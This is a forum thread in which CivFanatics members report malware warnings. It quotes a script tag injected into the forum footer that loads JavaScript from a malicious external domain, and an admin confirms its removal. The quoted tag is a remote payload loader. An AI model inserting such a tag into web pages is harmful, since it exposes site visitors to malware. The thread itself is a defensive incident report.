Malware warning on various CFC pages

Mise

Mise

isle of lucy
Joined
Apr 13, 2004
Messages
28,669
Location
London, UK
I'm getting warnings from my antivirus software (avast) about some weird site on basically all CFC pages. The site is http://www.sslcheck0992.com; it's saying that the site is malicious. There's no way I'm actually going to go to that site to check it out -- maybe someone can do it in a fresh VM. But I've added it to my hosts file, and I suggest you all do too (just like with that www.booklandonline.info or whatever it was).

Anyway, I think someone is putting some dodgy scripts onto CFC. This script is in the source of all pages I've checked:

<script type="text/javascript" async="async" src="http://www.sslcheck0992.com/cms/index.php"></script>

I see that it's got "async" -- I assume this is to prevent the site from hanging on the script, like on www.booklandonline.info did before.

Can the admins please check that the site hasn't been compromised? I recommend users not use the site without an antivirus software...
 
Thanks Mise. I have removed it. It's in forum footer like last time.

I will look into it further.

We do plan to upgrade forum in the near future.

Anything you think suspicious, please PM or email me, or post here.
 
Does this have anything to do with why the "back" (or refresh) button on the browser always displayed a blank page, but is now working correctly?
 
So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?
 
Was the forum hacked or did it come with infected ads? I'm interested in knowing/understanding how this is happening.
 
Does this have anything to do with these pop-up flash video ads I'm seeing on the site? Or are these ads legitimate?
 
My work filter is now flagging this whole site as malware too.
 
I just went to unsubscribe from a topic that I must have subscribed to years ago maybe, and got the following warning in Google's Chrome browser:

Warning: Something's Not Right Here!

forums.civfanatics.com contains content from www.weplayciv.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

We have already notified www.weplayciv.com that we found malware on the site. For more about the problems found on www.weplayciv.com, visit the Google Safe Browsing diagnostic page.

-------------------------------
The message in Chrome was coming up after I unsubscribed from a topic and then you get shown the redirect box that then sends you normally back to the topic that you unsubscribed from, from that redirect page is when Google Chrome catches it and pops up the message that I listed above.
:nono:
 
You must log in or register to reply here.

Similar threads

Quintillus
Forum customization scripts
Replies
1
Views
706
Quintillus
Quintillus
D
Custom properties on objects
Replies
2
Views
494
DeckerdJames
D
M
The Chiron Archives, a revived/replica fanfic site
Replies
0
Views
410
MysticWind
M
leif erikson
  • Locked
  • Sticky
Civ VII Forums Notice Board
Replies
0
Views
5K
leif erikson
leif erikson
The_J
Old World update #110
Replies
2
Views
2K
Dale
Dale
Back
Top Bottom